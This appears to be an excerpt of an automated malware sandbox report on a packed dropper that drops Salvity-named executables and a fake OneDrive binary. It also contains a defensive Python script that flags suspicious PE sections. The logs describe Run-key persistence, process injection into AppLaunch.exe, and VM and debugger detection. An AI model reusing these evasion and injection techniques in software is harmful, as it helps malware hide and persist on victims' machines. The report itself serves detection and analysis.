Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: 3gNuta
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: qi7ga
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: p4YOu8
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: jnlhoc
Source: [New]Salvity_crypted(2).exe.0.dr Static PE information: section name: tM59c
Source: OneDrive.exe.11.dr Static PE information: section name: _RDATA
Source: initial sample Static PE information: section where entry point is pointing to: crL2t
Source: initial sample Static PE information: section name: e5WJl% entropy: 6.83077583857
Source: initial sample Static PE information: section name: p4YOu8 entropy: 6.82903967551
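The section listing above is what a packer leaves behind: random five-to-seven character section names (one of them containing '%'), an entry point in crL2t rather than .text, and two sections at about 6.8 bits of entropy. The installer's own header flags deserve a second look as well: it carries DYNAMIC_BASE together with RELOCS_STRIPPED, and without a relocation table the loader cannot rebase the image, so the ASLR flag is ineffective. The checks below are an added example, not Joe Sandbox's engine and not code from the sample. They parse the section table and characteristics with struct alone; build_sample_pe() constructs a minimal PE32 in memory whose section names, entry section and flags mirror the report's so the checks run offline. The 6.5-bit entropy threshold and the list of conventional section names are this example's own choices.

```python
"""Static section and header checks of the kind this report flags.

Added example, not Joe Sandbox's engine or code from the sample. Only struct
is used to parse the PE; build_sample_pe() fabricates a minimal PE32 in memory
whose names, entry section and header flags mirror the report. Thresholds and
the conventional-name list are this example's own choices.
"""
import math
import random
import re
import struct

COFF_FLAGS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
              0x0004: "LINE_NUMS_STRIPPED", 0x0008: "LOCAL_SYMS_STRIPPED",
              0x0100: "32BIT_MACHINE"}
DLL_FLAGS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
             0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
CONVENTIONAL = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc", ".reloc",
                ".bss", ".tls", ".pdata", ".ndata", ".CRT", "_RDATA"}
SECTION_HDR = "<8sIIIIIIHHI"        # IMAGE_SECTION_HEADER, 40 bytes
HIGH_ENTROPY = 6.5                  # bits per byte; chosen for this example
IMAGE_SCN_MEM_EXECUTE = 0x20000000


def shannon_entropy(buf):
    n = len(buf)
    if n == 0:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def build_sample_pe(sections, entry_section, coff_chars=0x010F, dll_chars=0x8540):
    """sections: [(name, raw_bytes, characteristics)], each blob padded to 0x200.
    Default flags reproduce the installer's: RELOCS|EXEC|LINE_NUMS|LOCAL_SYMS|32BIT
    and DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE."""
    n = len(sections)
    raw_start = (64 + 4 + 20 + 224 + 40 * n + 0x1FF) & ~0x1FF   # file-aligned
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 224, coff_chars)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000 * (entry_section + 1) + 0x10)  # entry RVA
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, 0x200)  # base, alignments
    struct.pack_into("<H", opt, 70, dll_chars)                   # DllCharacteristics
    image = bytearray(dos + b"PE\0\0" + coff + opt)
    body = bytearray()
    for i, (name, raw, chars) in enumerate(sections):
        image += struct.pack(SECTION_HDR, name.encode("latin-1").ljust(8, b"\0"),
                             0x200, 0x1000 * (i + 1), 0x200, raw_start + 0x200 * i,
                             0, 0, 0, 0, chars)
        body += raw[:0x200].ljust(0x200, b"\0")
    return bytes(image.ljust(raw_start, b"\0") + body)


def inspect_pe(data):
    """Parse headers and the section table; return flag names, per-section
    findings, the entry section, and whether DYNAMIC_BASE can take effect."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsec, _, _, _, opt_size, coff_chars = struct.unpack_from("<HHIIIHH", data, pe + 4)
    entry = struct.unpack_from("<I", data, pe + 24 + 16)[0]
    dll_chars = struct.unpack_from("<H", data, pe + 24 + 70)[0]
    result = {"coff_flags": [v for k, v in COFF_FLAGS.items() if coff_chars & k],
              "dll_flags": [v for k, v in DLL_FLAGS.items() if dll_chars & k],
              "entry_rva": entry, "entry_section": None, "sections": []}
    for i in range(nsec):
        hdr = struct.unpack_from(SECTION_HDR, data, pe + 24 + opt_size + 40 * i)
        name, vsize, va, rsize, rptr, *_, chars = hdr
        name = name.rstrip(b"\0").decode("latin-1")
        ent = shannon_entropy(data[rptr:rptr + rsize])
        flags = []
        if name not in CONVENTIONAL:
            flags.append("non_standard_name")
        if not re.fullmatch(r"[A-Za-z0-9_.$]+", name):
            flags.append("special_chars")
        if ent >= HIGH_ENTROPY:
            flags.append("high_entropy")
        if va <= entry < va + max(vsize, rsize):
            result["entry_section"] = name
            if not chars & IMAGE_SCN_MEM_EXECUTE:
                flags.append("entry_in_non_executable_section")
        result["sections"].append({"name": name, "va": va, "entropy": round(ent, 3), "flags": flags})
    result["entry_outside_standard"] = result["entry_section"] not in CONVENTIONAL
    # The loader cannot rebase an image without a relocation table, so
    # DYNAMIC_BASE alone does not give ASLR.
    result["aslr_effective"] = ("DYNAMIC_BASE" in result["dll_flags"]
                                and "RELOCS_STRIPPED" not in result["coff_flags"])
    return result


def sample_from_report():
    """Three sections named as in the report: a normal .text, the packer section
    that holds the entry point, and one whose name contains '%'."""
    rng = random.Random(620098)                      # deterministic 'packed' bytes
    packed = bytes(rng.getrandbits(8) for _ in range(0x200))
    return build_sample_pe([
        (".text", b"\x90" * 0x200, 0x60000020),      # CODE | EXECUTE | READ
        ("crL2t", packed, 0xE0000040),               # INIT_DATA | EXEC | READ | WRITE
        ("e5WJl%", packed[::-1], 0xC0000040),        # INIT_DATA | READ | WRITE
    ], entry_section=1)


if __name__ == "__main__":
    r = inspect_pe(sample_from_report())
    print(r["coff_flags"], r["dll_flags"], "ASLR effective:", r["aslr_effective"])
    print("entry point in", r["entry_section"], "outside standard:", r["entry_outside_standard"])
    for s in r["sections"]:
        print(f"  {s['name']!r:10} VA=0x{s['va']:x} entropy={s['entropy']:.2f} {s['flags']}")
```

Run inspect_pe() on the real dropped files ([New]1.exe and [New]Salvity_crypted(2).exe) to reproduce the report's section findings; the sample builder only exists so the block is self-contained.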

Persistence and Installation Behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: reg.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: reg.exe
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File created: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe File created: C:\Users\user\AppData\Roaming\[New]1.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneDrive
Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run OneDrive
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_0040646B FindFirstFileA,FindClose, 0_2_0040646B
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_004027A1 FindFirstFileA, 0_2_004027A1
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_004058BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00406F00 FindFirstFileA, 11_2_00406F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004364E3 FindFirstFileExW, 11_2_004364E3
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe API call chain: ExitProcess graph end node
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-USne
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareKA8A7T_ZWin32_VideoController84C7EP7MVideoController120060621000000.000000-00063410463display.infMSBDA1D9EZDPZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsWGRE8CMV
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMwareKA8A7T_ZWin32_VideoController84C7EP7MVideoController120060621000000.000000-00063410463display.infMSBDA1D9EZDPZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsWGRE8CMVrInte
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00429143 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00429143
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00437E10 GetProcessHeap, 11_2_00437E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00429634 mov eax, dword ptr fs:[00000030h] 11_2_00429634
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004326E4 mov eax, dword ptr fs:[00000030h] 11_2_004326E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004326A0 mov eax, dword ptr fs:[00000030h] 11_2_004326A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00432715 mov eax, dword ptr fs:[00000030h] 11_2_00432715
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00421C60 mov eax, dword ptr fs:[00000030h] 11_2_00421C60
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A03A35 mov eax, dword ptr fs:[00000030h] 21_2_00A03A35
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A0EC04 mov eax, dword ptr fs:[00000030h] 21_2_00A0EC04
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009F27C0 mov eax, dword ptr fs:[00000030h] 21_2_009F27C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: page read and write | page guard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00425476 SetUnhandledExceptionFilter, 11_2_00425476
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004252E3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_004252E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00424E5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00424E5C
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009FA8E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 21_2_009FA8E8
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_00A00430 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_00A00430
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: 21_2_009FAC0D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 21_2_009FAC0D

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Roaming\[New]1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\AppData\Roaming\[New]1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 9C7008
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 9B4008
Source: C:\Users\user\AppData\Roaming\[New]1.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\[New]1.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\[New]1.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: EnumSystemLocalesW, 21_2_00A108E9
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: EnumSystemLocalesW, 21_2_00A109CF
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: EnumSystemLocalesW, 21_2_00A10934
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: EnumSystemLocalesW, 21_2_00A06276
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 21_2_00A10DD3
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 21_2_00A10647
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 21_2_00A10FA8
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe Code function: GetLocaleInfoW, 21_2_00A06798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_00402440 cpuid 11_2_00402440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Code function: 11_2_004251D0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 11_2_004251D0
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348